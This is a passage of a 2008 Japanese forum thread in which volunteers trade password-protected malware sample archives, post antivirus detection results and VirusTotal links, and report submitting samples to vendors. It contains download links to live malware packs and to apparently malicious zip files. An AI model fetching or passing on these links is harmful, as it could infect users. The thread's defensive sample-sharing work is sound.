AVG提出しました。

553 :名無しさん@お腹いっぱい。:2008/10/05(日) 22:05:45
>>548-550
ZERO, avast, AntiVirで撃退

554 :538:2008/10/06(月) 01:23:54
>>535
カスペからの返事

Hello,

9 > A9loader_77025301.exe_,
5 > aklremover.exe_,
6 > setup_mwc.exe_,
a > update.exe_

No malicious code were found in these files.(悪意のあるコードなし)

2> DJ12335.exe_ - Trojan-Downloader.Win32.Dadobra.bkl

This file is already detected. Please update your antivirus bases.(既に検知済み)

3 > inform.com_ - Trojan.Win32.Agent.afxq,
1 > item.gif_ - Trojan.Win32.Agent.afxs,
b > zcodec.0.exe_ - Trojan-Downloader.Win32.Agent.aivt

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.(マルウェア検出)

Please quote all when answering.


結局 4+追加4=8/12 (0,1,2,3,4,7.,8,,b)

555 :名無しさん@お腹いっぱい。:2008/10/07(火) 04:17:12
検出

556 :名無しさん@お腹いっぱい。:2008/10/07(火) 14:50:43
>>522 の更新。
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=89
virus

AntiVir Dr.WEB Kaspersky での全機撃墜を確認、
Nortonには提出済み。

557 :名無しさん@お腹いっぱい。:2008/10/07(火) 15:45:10
>>556
McAfeeスルーヽ(`Д´)ノ

提出したWebImmuneの自動判定
sqlc1.exe new detection generic backdoor
wow1.exe new detection generic.dx
wow1_1.exe new detection generic pws.y
wow1_2.exe new detection generic pws.y

こいつらは近日対応する模様

558 :名無しさん@お腹いっぱい。:2008/10/07(火) 16:23:00
ちなみにNortonの自動返信
filename: sqlinject1.exe
result: This file is detected as W32.SillyFDC
1匹しか検知してねぇ。

559 : ◆W32/Vael.o :2008/10/08(水) 08:38:10
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=90
Malware-Pack46

例によってMcAfeeには提出済み

560 :名無しさん@お腹いっぱい。:2008/10/08(水) 09:36:01
AntiVir 9/12
残り提出


561 :名無しさん@お腹いっぱい。:2008/10/08(水) 09:44:46
>>559
d
カスペ2009@9:15:00

8/12 (0,1,4,5,6,7,8,9)

Detected Trojan program Trojan.Win32.Pakes.ktq         Malware/0/video.cfg
Detected Trojan program Trojan.Win32.Inject.iol        Malware/1/load.exe
Detected Trojan program Trojan.Win32.Monder.rcm        Malware/4/winupdate.001
Detected Trojan program Trojan-Downloader.JS.Agent.csm Malware/5/1.gif
Detected riskware not-a-virus:FraudTool.Win32.Devushka.ae Malware/6/AntiMalware2009Installer.exe
Detected Trojan program Trojan-Downloader.Win32.Injecter.aqq Malware/7/load.exe
Detected Trojan program Trojan-Downloader.Win32.Zlob.aabo Malware/8/setup.exe
Detected Trojan program Backdoor.Win32.SdBot.hnj        Malware/9/install_flash_player.exe

検体提出します。

562 :名無しさん@お腹いっぱい。:2008/10/08(水) 10:22:44
0 http://www.virustotal.com/analisis/8c9f10ccfc4788fab99116a677d97fee
1 http://www.virustotal.com/analisis/61e8a6c8300aea8beab0db842b8ce38d
2 http://www.virustotal.com/analisis/892d81cc0ac6a431ef4d84214945447f
3 http://www.virustotal.com/analisis/018bb0a52353f7dce6d7581b0797b8db
4 http://www.virustotal.com/analisis/6862e7b9d7c5b3bfa132d86c7eb43b83
5 http://www.virustotal.com/analisis/51cb58fd8efdf839cb5cd4c239fd9d49
6 http://www.virustotal.com/analisis/a9953020f5a3b1b0d0bd99a92c71968c
7 http://www.virustotal.com/analisis/7635a467b4ca1c43fcb19bd25ceeab19
8 http://www.virustotal.com/analisis/1088956dacfb6e521ab8ce83b6bcc625
9 http://www.virustotal.com/analisis/9fcd40d074c3618ae54821c3392f8e04
a http://www.virustotal.com/analisis/f664d0d7f36ac8ab265fdd5480b78c93
b http://www.virustotal.com/analisis/521269733c782f0bc6fbb31ae40df6e9

563 :名無しさん@お腹いっぱい。:2008/10/08(水) 10:25:34
キングもヨロ

564 :561:2008/10/08(水) 11:28:06
>>559
カスペからの返事

Hello,

2 > c.exe_

This file is corrupted. (ファイル破損)

b > fix12.exe_ - Trojan.Win32.Agent.ageh,
3 > HDVideoExtension_ver1.5624.0.exe_ - Trojan-Downloader.Win32.Agent.ajco,
a > MSCodecLt.v.1.0.exe_ - Trojan-Downloader.Win32.Agent.ajcl

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Sergey Prokudin
Virus analyst, Kaspersky Lab.

8+追加3=11/12 (2以外黒)

565 :名無しさん@お腹いっぱい。:2008/10/08(水) 18:14:43
>>559
NIS2009で 5/12 (0、1、2、6、a)
未検出は贈っておきます

566 :名無しさん@お腹いっぱい。:2008/10/09(木) 19:27:54
Kingsoft Internet Security U

>>556
sqlc1.exe検出

>>559
Malware/9/install_flash_player.exe検出

どちらも未検出検体は提出済み

567 :名無しさん@お腹いっぱい。:2008/10/11(土) 00:15:23
http://vamp.s9.xrea.com/updata2/3007.zip

568 :名無しさん@お腹いっぱい。:2008/10/11(土) 00:17:17
>>567
>>3

569 :名無しさん@お腹いっぱい。:2008/10/13(月) 12:37:48
トヨタのページ(http://toyota.jp/) が反応したので
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=91
pass virus

kaspersky
感染しています: トロイの木馬 Trojan.JS.Agent.db Content.IE5\K0U9DY55\v53[1].js


http://www.virustotal.com/jp/analisis/244f0c65d06196ff458b2ed72e1e0b7f

570 :名無しさん@お腹いっぱい。:2008/10/13(月) 13:15:02
>>569
TOYOTA
大変申し訳ありませんが、該当ページがございません。
トップページへご案内いたします。
このページをブックマーク登録されていた方は、
お手数ですがブックマークの変更をお願いいたします。
トヨタ自動車株式会社
なお、このページは5秒後に自動的にジャンプします。
※自動的にジャンプしない場合は、上記のリンクをクリックして下さい。
(c) TOYOTA MOTOR CORPORATION. All Rights Reserved.


571 :名無しさん@お腹いっぱい。:2008/10/13(月) 13:38:34
>>570
)までリンクされている
ttp://toyota.jp

572 :名無しさん@お腹いっぱい。:2008/10/13(月) 14:01:30
こりか。。。
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fsecure-jp.imrworldwide.com%2Fv53.js&hua=&phishing=on
ttp://www.siteadvisor.com/sites/imrworldwide.com

573 :名無しさん@お腹いっぱい。:2008/10/13(月) 15:36:40
シマンテックから爆速で返事北

> Developer notes:
> v53.js contains no malicious code.

574 :名無しさん@お腹いっぱい。:2008/10/13(月) 17:26:46
>>569
McAfeeに提出させて頂ました。

575 :名無しさん@お腹いっぱい。:2008/10/13(月) 18:24:53
>>569
(´・ω・`) ?
ttp://www.virustotal.com/analisis/ac0a33a4db6109ccb44a53db30a07b11

576 :名無しさん@お腹いっぱい。:2008/10/13(月) 18:46:57
>>575
>>569
(-_-)??
http://www.virustotal.com/jp/analisis/4c370d9b9f9342d0180741f83fcecc09

>>569ファイル名 v53.js 受理 2008.10.13 05:14:24 (CET)結果: 1/36 (2.78%)
>>575File v53.js received on 10.13.2008 10:48:49 (CET)Result: 0/36 (0.00%)
>>576ファイル名 v53.js 受理 2008.10.13 11:29:38 (CET)結果: 3/36 (8.33%)

577 :575:2008/10/13(月) 19:26:58
こちらの環境では
>>569のtane0091\v53.jsは
MD5:
900568607C8F8DC5D69D755607298D2E
SHA1:
05AC8A7E45B84C7E16CECBE2BA3BC942FD21D594

toyota.jpの先の>>572のv53.jsは
MD5:
A8CC021CD9225E87EC98DF2FD09609DA
SHA1:
C5DFB91B9A1FC6BFA5BA9520B03F707D2CA96E98
>>569>>576のVTと同じだたぁー

DL中に壊れたのかな?

578 :名無しさん@お腹いっぱい。:2008/10/13(月) 21:25:33
http://www1.axfc.net/uploader/He/so/146883.zip&key=news

579 :名無しさん@お腹いっぱい。:2008/10/13(月) 21:34:26
>>578
>>3

580 : ◆W32/Vael.o :2008/10/15(水) 19:09:24
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=92
Malware-Pack47

例によってMcAfeeには提出済み

581 :名無しさん@お腹いっぱい。:2008/10/15(水) 22:25:07
>>580
d

カスペ2009@21:26:00

6/12(03,.4,7,9,a)

Detected Trojan program Trojan-Downloader.Win32.Zlob.aagk    0/setup.exe
Detected virus not-a-virus:FraudTool.Win32.SmartAntivirus2009.d 3/sa2009.exe
Detected Trojan program Trojan.Win32.Humor.ic           4/play-video.exe
Detected Trojan program Heur.Trojan.Generic            7/bk.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.vcnp 9/zcodec.1113.exe
Detected virus not-a-virus:FraudTool.Win32.Agent.cx        a/pcprotectioncenter_setup.exe

検体提出します。

582 :名無しさん@お腹いっぱい。:2008/10/15(水) 23:07:09
>>580

0 http://www.virustotal.com/analisis/27885a454ac4be8a602ac4b028504b17
1 http://www.virustotal.com/analisis/83c6837aa758bede279ef924628c8103
2ファイルなし?
3 http://www.virustotal.com/analisis/d65acfac0326135982f3d6bbdf1223d9
4 http://www.virustotal.com/analisis/d65acfac0326135982f3d6bbdf1223d9
5 http://www.virustotal.com/analisis/d65acfac0326135982f3d6bbdf1223d9
6 http://www.virustotal.com/analisis/ec838a0b7da7b1a80908eccc6968fdd3
7 http://www.virustotal.com/analisis/e2bbb06d2fe4f1c11636019256b72dde
8 http://www.virustotal.com/analisis/e130af4b36c234c1b50b24b281e9776f
9 http://www.virustotal.com/analisis/99632bc2bcce28a681f9aa74333b3f39
a http://www.virustotal.com/analisis/98f64d1bdd4b532a03052aafe5767336
b http://www.virustotal.com/analisis/00bf016ccf1f41128d5bf60ace997091

583 :名無しさん@お腹いっぱい。:2008/10/15(水) 23:29:32
>>580
書庫に難アリ
0、1しか解凍出来ないよー
再up希望

584 :名無しさん@お腹いっぱい。:2008/10/16(木) 09:23:27
こっちの手元では正常に解凍できるんだが…
2はファイルはいってないねw

585 :名無しさん@お腹いっぱい。:2008/10/16(木) 12:30:16
Archive: tane0092.zip
Length Date Time Name
-------- ---- ---- ----
12800 08/10/11 14:59 Malware/0/setup.exe
17782 08/10/06 14:00 Malware/1/search.jpg
0 08/10/08 08:47 Malware/2/
1431040 08/10/07 19:29 Malware/3/sa2009.exe
22020 08/10/07 19:33 Malware/4/play-video.exe
1881040 08/10/08 10:07 Malware/5/virdest.exe

ないね

586 :名無しさん@お腹いっぱい。:2008/10/16(木) 15:02:17
ステルスマルウェア

587 :名無しさん@お腹いっぱい。:2008/10/17(金) 01:19:59
違うスレにコピペすると(ry

588 :名無しさん@お腹いっぱい。:2008/10/18(土) 00:10:06
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=93
Pass:virus

Avast!&DrWebに提出済み

589 :名無しさん@お腹いっぱい。:2008/10/18(土) 00:35:33
>>588
http://www.virustotal.com/analisis/3d01aa38ffe6b95d09d0ac330055ad1a

avast!は検出するんですけど・・・・

Win32:Trojan-gen {Other}

590 :名無しさん@お腹いっぱい。:2008/10/18(土) 00:41:14
と思ったらVirustotalのavast!のパターンファイルが古いみたいだな

VPSバージョン:081016-0, 2008/10/16

591 :名無しさん@お腹いっぱい。:2008/10/18(土) 02:53:00
>>588
McAfeeに提出させて頂ました。

592 :名無しさん@お腹いっぱい。:2008/10/18(土) 21:13:41
>>398

カスペからの亀返事
1ヶ月かかったorz

0\setup.exe

Hello.

File contains not-a-virus:FraudTool.Win32.SpywareStop.hb

ウイルスウォッチを見ると、19:17検知。シグネチャ未作成。

http://www.virustotal.com/analisis/621f8936ec9b01ab90ade661f270a376


>>414のVerisignの署名付きの砂箱超えたやつか?
鯖から消えているからわからない。

593 :名無しさん@お腹いっぱい。:2008/10/19(日) 12:42:12
カスペも処理能力が追いつかなくなってきたのかな?

594 :名無しさん@お腹いっぱい。:2008/10/19(日) 16:44:34
【緊急!】ウイルス即行駆除方法【助けて!】Part3
http://pc11.2ch.net/test/read.cgi/sec/1214830385/599,606,635,640

ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=94
DLKey:634

595 :名無しさん@お腹いっぱい。:2008/10/19(日) 19:11:55
>>594
一応、カスペに検体提出した。

596 :名無しさん@お腹いっぱい。:2008/10/19(日) 19:21:02
>>595
一応かyoプンスカ

>>594
念の為、McAfeeに検体提出した。

597 :名無しさん@お腹いっぱい。:2008/10/19(日) 21:12:47
>>594
砂箱で実行してみたけど、マルウェアじゃなかったよ。
XPで実行したら・・・

ご使用中のオペレーションシステムはFSTIEmcf.exeではサポートされてません。
動作環境については、FSTIEmcf.txtをご確認ください。

って出てきた。(笑

598 :595:2008/10/19(日) 21:23:54
カスペからの返事
>>594

Hello.

No malicious software was found in the attached file.

-----------------
Regards, Evgeny Aseev
Virus Analyst, Kaspersky Lab.



599 :名無しさん@お腹いっぱい。:2008/10/19(日) 21:37:57
>>594
http://www.virustotal.com/analisis/e4c6a3b503e2e37a9ed2b7d175bce478

>>598を見るとSRI上位のベンダー(AntiVir、avast!、AVG、BitDefender)とカスペの違いがわかるな
ウイルス対応速度のみでPacker捕獲やGeneric検出というのを除いて一番性能良いのはカスペなのかも

600 :名無しさん@お腹いっぱい。:2008/10/20(月) 16:40:56
SRIで一時期バスターがトップになってたのは
バスターがPackerを有害判定するようになって
SRIがそれをスルー扱いしなかったからだね。

601 :名無しさん@お腹いっぱい。:2008/10/20(月) 18:58:40
http://www.virustotal.com/analisis/9e0da2bb65c10ed16a7045fadf3a3a41

Avast 4.8.1248.0 2008.10.15 VBS:LoveLetter-C

Virustotalのavast!の時間が止まってる件について

最新は↓こっち

現在の更新の情報
合計時間: 16 s

- Vps: 既に最新です
(現在のバージョン 081018-0)

サーバー: download976.avast.com (74.54.138.162)
ダウンロード ファイル: 2 (0.02 KB)
ダウンロード時間: 2 s

602 :名無しさん@お腹いっぱい。:2008/10/20(月) 19:01:06
>>600
でも現時点でもバスターはPackerを蹴るよね?

603 :名無しさん@お腹いっぱい。:2008/10/20(月) 22:26:48
うん、SRIがそれをノーカウントにし始めた。

604 :名無しさん@お腹いっぱい。:2008/10/20(月) 22:30:55
結果がNODとの最下位争いか
まぁ妥当なとこだな

605 :名無しさん@お腹いっぱい。:2008/10/20(月) 22:35:16
バスターは一時期1717というスルー検体を出したけどそこから300以上スルー検体を減らしたのは評価できるんじゃない?しかもたった1ヶ月半という短期間で

SRIの動向見てるとノートンも地味に良くなってるよね、これはノートンの対応速度が早くなってるということなんだろうね
SRI上位はともかく中位に位置するCATやVirusbusterは落ちた方がいいな、これらが中位にいると誤検出ランキングと思われても仕方ない

606 :名無しさん@お腹いっぱい。:2008/10/20(月) 23:03:00
>>605
実際、その側面もあるよ。
SRI(笑)は、VTで、CATなど一つでも検出したらマルウェア扱いでしょ。

607 :名無しさん@お腹いっぱい。:2008/10/20(月) 23:16:07
だからノートンやマカフィーの対応速度が早くなってCATやVirusbusterには落ちてもらわないと
ノートンはともかくマカフィーはSRIで最近やや停滞気味なのが気になるけど
ノートンは今の調子ならSRIでは最終的にカスペよりちょっと下という程度まで追いつくんじゃないかと見てる

SRIの動向見てると何気にPandaも良くなってるよな、まあPandaも実力あるベンダーだから頑張ってもらわないと

608 :名無しさん@お腹いっぱい。:2008/10/20(月) 23:39:00
それ以前にマルウェアかどうか調べずに検体に使用しているSRIはどうかと思う。
確か、どれか1つのベンダーでもマルウェアと判定すればそれはマルウェアになっちゃうんだよね?(違

あと、カスペは7のエンジン(VTが7)だから2009だともうちょい良いかも。

609 :名無しさん@お腹いっぱい。:2008/10/20(月) 23:52:32
SRIのサンプルは、CyberTAの方で確認したマルウェアを利用しているのであって
VTでマルウェア判定しているのではないよ……

610 :名無しさん@お腹いっぱい。:2008/10/21(火) 00:10:17
>>609
これか・・・
http://www.cyber-ta.org/Honeynet/

ってことはSRIで使ってる検体はちゃんとしたマルウェアってことでおk?

611 :名無しさん@お腹いっぱい。:2008/10/21(火) 00:25:50
DISCLAIMER: These detection rates represent the TRUE POSITIVE detection rates of these various antivirus tools on the limited corpus of malware binaries captures by our honeynet.
The results do not take into consideration the false positive rate of a given tool, and thus a tool that declares everything to be infected
would appear to have the highest true positive percentage rate. All antivirus results provided via www.virustotal.com.

注意書き
この結果は、誤検出のレートを全く考慮に入れていません。
従って、あらゆるものに対して陽性反応を出すAVは、最も高い検出率を示すことになります。

結論 無意味

Wilders Security Forumsでも、スルーされてる。論ずるに値しないとしてスルーされてる。
http://www.wilderssecurity.com/showthread.php?t=222657

>>609 ツールで機械的に収集されているマルウェア。壊れているものもある。

612 :名無しさん@お腹いっぱい。:2008/10/21(火) 00:27:49
Second: Lately there has been a large proliferation of tests based on VirusTotal. I won't comment on those automatic tests but instead I would focus on a question:
where is written how tested samples are really choosed? How samples are really tested if they are really malware and if they are really dangerous and not in any way corrupted files?

On that webpage there's only written "on the limited corpus of malware binaries captures by our honeynet" . It's not really the best way, for a lot of reasons.

Just an example: some antiviruses detect corrupted files as corrupted, some other detect corrupted files as malware (presence of the signature)
even if they are clearly corrupted and they can't be executed at all, some other don't detect corrupted files.

So do antiviruses that don't detect corrupted files score worse than other antiviruses? Why?

613 :名無しさん@お腹いっぱい。:2008/10/21(火) 00:56:16
>>611-612
NODの大本営と名高いWilders Security Forumsからの引用かよ
しかもPrevx社員による発言とは恐れ入った(笑

参考
27th 62% 1362 NOD32v2
30th 25% 2695 Prevx1

614 :名無しさん@お腹いっぱい。:2008/10/21(火) 01:09:49
>>613
> >>611-612
> NODの大本営と名高いWilders Security Forumsからの引用かよ

それじゃ、SpywareBlaster, Look'n'Stop, Acronis, ewido (AVG anti-spyware) なんかも
Wilders Security Forumsを公式サポートフォーラムにしてるから信頼できないな
2ch仕様としては全部入れてはいけないソフトだな

615 :名無しさん@お腹いっぱい。:2008/10/21(火) 02:15:19
誰も信頼の有無なんか論じてないんだがw
数多くある意見の1つってだけの話
なに必死ぶっこいてんの?

616 :名無しさん@お腹いっぱい。:2008/10/21(火) 13:14:27
>>615
一番スレでやれ

617 :名無しさん@お腹いっぱい。:2008/10/21(火) 15:21:08
>>616
悔しかったの?w
>>611前後の連中に言えよ

618 :595:2008/10/21(火) 16:03:26
>>594
カスペからの返事をまとめると、8/11

Hello,

bk.exe_ - Trojan.Win32.Autoit.eu,
InternetGameBox_setup.exe - Trojan.Win32.Obfuscated.vir,
setup_110144_3.exe_ - Trojan-Downloader.Win32.FraudLoad.vctr

These files are already detected. Please update your antivirus bases.

search.jpg_, YMStatus.exe_ ,virdest.exe_

No malicious code were found in these files.

Please quote all when answering.


619 :名無しさん@お腹いっぱい。:2008/10/21(火) 18:47:43
レス番が580あたりの間違いだろうと思うが乙

620 :名無しさん@お腹いっぱい。:2008/10/21(火) 20:53:46
ttp://www.youturebe.com/watch/bRgdOsgPxVg.zip

621 :名無しさん@お腹いっぱい。:2008/10/21(火) 20:57:20
>>620
http://www.virustotal.com/analisis/baff91040285bdf574f7cebe3278308e

622 :名無しさん@お腹いっぱい。:2008/10/21(火) 22:50:46
>>620
シマンテックに送りました

623 :名無しさん@お腹いっぱい。:2008/10/22(水) 23:22:06
ほぼ全社検出だが、ネタとしてリンクのリンクだけ
http://pc11.2ch.net/test/read.cgi/sec/1140517079/

624 :名無しさん@お腹いっぱい。:2008/10/22(水) 23:22:40
ごめん http://pc11.2ch.net/test/read.cgi/sec/1140517079/967-

625 :名無しさん@お腹いっぱい。:2008/10/23(木) 07:15:28
>>620
Symantec対応
NODも亜種で検出

http://www.virustotal.com/analisis/215977d033b7045da2d5fa1052d828fe

626 : ◆W32/Vael.o :2008/10/23(木) 20:42:48
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=95
Malware-Pack48

例によってMcAfeeには提出済み

627 :名無しさん@お腹いっぱい。:2008/10/23(木) 21:38:38
>>626
d
カスペ2009 20:38:00

7/12 (2,3,5,6,7,9,b)

Detected adware not-a-virus:AdWare.Win32.Cinmus.vpb        /2/PrivateContent.exe
Detected adware not-a-virus:AdWare.Win32.Agent.gbm          /3/49.exe//data0003
Detected Trojan program Trojan-PSW.Win32.QQPass.dwt        /5/album.com//UPX
Detected Trojan program Trojan-Downloader.Win32.Small.afnj     /6/Plug-in.exe
Detected Trojan program Trojan-Downloader.Win32.CodecPack.dc   /7/xcodec.86.exe
Detected riskware not-a-virus:RemoteAdmin.Win32.WinVNC-based.c  /9/UBS-Support.com.exe
Detected Trojan program Trojan.Win32.FraudPack.gld           /b/setup_1_1_.exe


検体提出します。

628 :名無しさん@お腹いっぱい。:2008/10/23(木) 23:09:37
>>626
NIS2009で 2/12 (3、b)
未検出は贈っておきます

629 :627:2008/10/23(木) 23:12:56
>>626
カスペからの返事

0 : setup.exe_ - Trojan-Downloader.Win32.FraudLoad.vcxo
1 : setup.exe_ - not-a-virus:FraudTool.Win32.ErrorKiller
4 : A9installer_880020.exe_ - not-a-virus:FraudTool.Win32.Antivirus2009.ak
8 : ex002.exe_ - Trojan.Win32.Agent.ajlg

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

a : SetupCasino.exe_

No malicious code was found in this file.

結局、7+追加4=11/12 (a以外全て)

630 :名無しさん@お腹いっぱい。:2008/10/23(木) 23:26:47
>>626
Rising Internet Security 2009 21.15.21 (21.00.30.00) Last Update Time=2008-10-23 18:43
a\SetupCasino.exe>>pecompact2x: Adware.Win32.Agent.kje

631 :名無しさん@お腹いっぱい。:2008/10/29(水) 00:40:36
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=96
Pass:virus

カスペには提出済み

632 :名無しさん@お腹いっぱい。:2008/10/29(水) 00:56:39
>>631
http://www.virustotal.com/analisis/d42982ad1ae8a5493918333a630f9f8a
カスペは既に検出してる
それよりAntiVir・・・・
ま、AntiVirと今のSymantecなら爆速対応だから問題ないということでこれらの検体提出はよろしく
とりあえずPandaに提出しておいた

633 :名無しさん@お腹いっぱい。:2008/10/29(水) 04:33:43
>>631
McAfeeに提出させて頂ました。

634 :632:2008/10/29(水) 07:15:01
Pandaは対応した模様
http://www.virscan.org/report/c455326d9b96a1739443f77f416e4d11.html

635 :名無しさん@お腹いっぱい。:2008/10/29(水) 10:05:34
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=97
Pass:virus

636 :名無しさん@お腹いっぱい。:2008/10/29(水) 10:11:41
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=98
Pass:virus

637 :名無しさん@お腹いっぱい。:2008/10/29(水) 14:46:52
>>635
http://www.virustotal.com/analisis/63ccdd64e6f577679dd2bb10b6599ad7
>>636
http://www.virustotal.com/analisis/1e67fa43b4d367b4d5822096a4e930ad

635はavast!のチェストからavast!に提出

638 :名無しさん@お腹いっぱい。:2008/10/29(水) 16:45:21
>>636
McAfeeに提出させて頂ました。

639 :名無しさん@お腹いっぱい。:2008/10/29(水) 16:48:12
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=99
Pass:virus

http://www.virustotal.com/jp/analisis/9bc54e9f220140c6b35816d5f76449bd
カスペに提出、対応済み

640 :名無しさん@お腹いっぱい。:2008/10/29(水) 17:24:43
>>639
McAfeeに提出させて頂ました。

641 :名無しさん@お腹いっぱい。:2008/10/29(水) 23:26:29
>>635
カスペに送りました。

642 :名無しさん@お腹いっぱい。:2008/10/30(木) 17:29:44
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=100
Pass:virus


643 :名無しさん@お腹いっぱい。:2008/10/30(木) 17:46:27
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=101
Pass:virus


644 :名無しさん@お腹いっぱい。:2008/10/30(木) 17:59:40
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=102
Pass:virus


645 :名無しさん@お腹いっぱい。:2008/10/30(木) 18:07:00
>>642
http://www.virustotal.com/analisis/916004ab85047193ae9731dff77d4e2e
>>643
http://www.virustotal.com/analisis/44b006e8eefe96df8a405d85a208ec8d
>>644
http://www.virustotal.com/analisis/cdc1c843290911b71b9cc2f1df61bbd0

646 :名無しさん@お腹いっぱい。:2008/10/30(木) 18:12:51
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=103
Pass:virus


647 :名無しさん@お腹いっぱい。:2008/10/30(木) 18:22:26
>>646
http://www.virustotal.com/analisis/855865c7f809a83e462d61d848ea0820

648 :名無しさん@お腹いっぱい。:2008/10/30(木) 18:37:00
鑑定スレかよ

649 :名無しさん@お腹いっぱい。:2008/10/30(木) 18:42:42
>>643
>>644
McAfeeに提出させて頂ました。

>>640
McAfeeからの自動受信確認メールなし

650 :名無しさん@お腹いっぱい。:2008/10/30(木) 21:37:27
>>642-644, 646
カスペ2009
スルーにつき、検体提出します。

651 :名無しさん@お腹いっぱい。:2008/10/30(木) 21:42:35
ここまでシマンテックに贈りました

652 :650:2008/10/30(木) 23:07:24
>>642-644

カスペからの返事

No malicious code was found in this file.

>>646は待ち。

653 :650:2008/10/30(木) 23:15:24
>>646も白とのこと。

654 :641:2008/10/31(金) 23:55:58
>>635
No malicious code was found in this file.と回答がきました

655 :名無しさん@お腹いっぱい。:2008/11/02(日) 00:13:58
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=105
Pass:virus

中身はZlob
antivirus.v.1.exeを実行すると、tempフォルダに無数のファイルを作成する。

ベンダーへの送信、お願いします。

656 :655:2008/11/02(日) 00:15:32
スマン。sageるの忘れた。(汗

657 :名無しさん@お腹いっぱい。:2008/11/02(日) 00:33:06
>>655
d

カスペ2009@ 23:46:00
2/4

Detected Trojan program Trojan-Spy.Win32.Zbot.fza zlob\034b4q5A.exe
Detected Trojan program Trojan.Win32.Agent.alml zlob\~tmpd.exe

検体提出します。

658 :名無しさん@お腹いっぱい。:2008/11/02(日) 04:28:20
>>655
McAfeeに提出させて頂ました。

659 :名無しさん@お腹いっぱい。:2008/11/02(日) 07:44:43
>>655

http://www.virustotal.com/analisis/9051a064a60001439da0c0cc1fb7825e
http://www.virustotal.com/analisis/f0d75d58ecb34b2261bf6bfbcbff06b7
http://www.virustotal.com/analisis/7c79b98238e97d5c1c49d1490a885b37
http://www.virustotal.com/analisis/7c79b98238e97d5c1c49d1490a885b37

バスター2009ではPAK_Generic.001が検出しないけどこれってトレンドマイクロ恒例の不具合?

660 :名無しさん@お腹いっぱい。:2008/11/02(日) 11:50:02
それただのPackerだから設定次第なんじゃね?

661 :657:2008/11/02(日) 21:29:00
>>655
カスペ2009
返事は来ないが、ダウンローダーとして追加検知。 2+追加2=4/4

Quarantined Trojan program Trojan-Downloader.Win32.Agent.anln antivirus.v.1.exe
Quarantined Trojan program Trojan-Downloader.Win32.Agent.anlx 6.exe

662 :名無しさん@お腹いっぱい。:2008/11/02(日) 21:43:04
avast!は今回のアップデートで大方検出するけど何故かVirustotalでは反応せず・・・

tmpd.exe
Win32:Trojan-gen {Other}

6.exe
Win32:Trojan-gen {Other}

034b4q5A.exe
Win32:Spyware-gen [Trj]

http://www.virustotal.com/analisis/637e7afc98e49179fe5f69bc826f5b1c
http://www.virustotal.com/analisis/dd53f7b8a8b3302b1bbc1be83a32c402
http://www.virustotal.com/analisis/8141b66b6b45cce7faec076fa7f765c1
http://www.virustotal.com/analisis/dcd2944c7c58f5d84e520d173006c3b9

それにしても今年になってからavast!の成長が目覚しいな

663 :名無しさん@お腹いっぱい。:2008/11/02(日) 21:56:41
SymantecってPacker検出するようになったの?

http://www.virscan.org/report/193fca501f2be64967bc18d49eb4af1b.html

664 :名無しさん@お腹いっぱい。:2008/11/02(日) 23:33:54
http://infosueek.com/arad/movie20856.zip

665 :名無しさん@お腹いっぱい。:2008/11/03(月) 00:11:55
>>664
ttp://www.virustotal.com/jp/analisis/830c55e01e288d6aacb6f4d0aafc5d6f

666 :名無しさん@お腹いっぱい。:2008/11/03(月) 23:33:52
>>655

11月3日時点の検出状況

http://www.virustotal.com/analisis/db58fedba92026b0a8259373d10049dc
http://www.virustotal.com/analisis/c9507aef924bde84153c5cf715a1f3bc
http://www.virustotal.com/analisis/808d2b5b3f0e4d29c6b5221ca5957343
http://www.virustotal.com/analisis/3448e00747b31ee1530fa40183dbe9eb

パーフェクト:AntiVir、AVG、Kaspersky
3個検出:avast!、バスター、GDATA
2個検出:McAfee
1個検出:Symantec、NOD32、Norman
オールスルー:BitDefender、Panda、K7

BitDefenderとPanda頑張れよ
それにしてもPandaはヒューリスティックが強力だしTruPreventテクノロジーだってあるししかも検体送れば2〜3日で対応してくれるのになんでSRIでは下位に沈むんだろ?
それが不思議で仕方ない、これだけ対応良かったら新種にもかなり強いはずなのに・・・

あと今回のVirustotalはF-Secureがなかった

667 :名無しさん@お腹いっぱい。:2008/11/03(月) 23:41:19
>>655
Symantecに送っておきました

668 :名無しさん@お腹いっぱい。:2008/11/04(火) 00:15:27
>>666
bitdefenderは、あさってあたりで対応すると思うよ。ちょっと遅いんだ

669 :名無しさん@お腹いっぱい。:2008/11/04(火) 15:15:25
>>660
スマソバスター2009でリアルタイム検索範囲を最大にしても検出しなかった
というわけで誰かバスター2009でPacker捕獲できるように設定できるのを知ってる方がいたら教えてください

670 :名無しさん@お腹いっぱい。:2008/11/04(火) 16:01:32
それはバスタースレで聞いたほうがいいんじゃ

671 :名無しさん@お腹いっぱい。:2008/11/04(火) 16:17:11
右クリックしてのコンテキストメニューからVirus Totalに送れなくなってるぜ……

672 :名無しさん@お腹いっぱい。:2008/11/04(火) 16:23:48
>>669
コーポレートエディションならできるんじゃない?

673 :名無しさん@お腹いっぱい。:2008/11/05(水) 07:45:58
>>655
11/5時点の検出状況

http://www.virustotal.com/analisis/bd9f619a9aa00da1d50dd2bd08c5fa15
http://www.virustotal.com/analisis/40c17ae263e801df468a39c278a9c97b
http://www.virustotal.com/analisis/a1834ea94d93facfaf6b31008aba4095
http://www.virustotal.com/analisis/ce72a25d1338f584d5323ffa3e70b310

全検出:AntiVir、AVG、avast!、BitDefender、Kaspersky、NOD32、Panda、F-Secure
3個検出:Symantec、バスター、McAfee、Microsoft、Noroman、Sophos、アンラボ
2個検出:K7(ZERO)
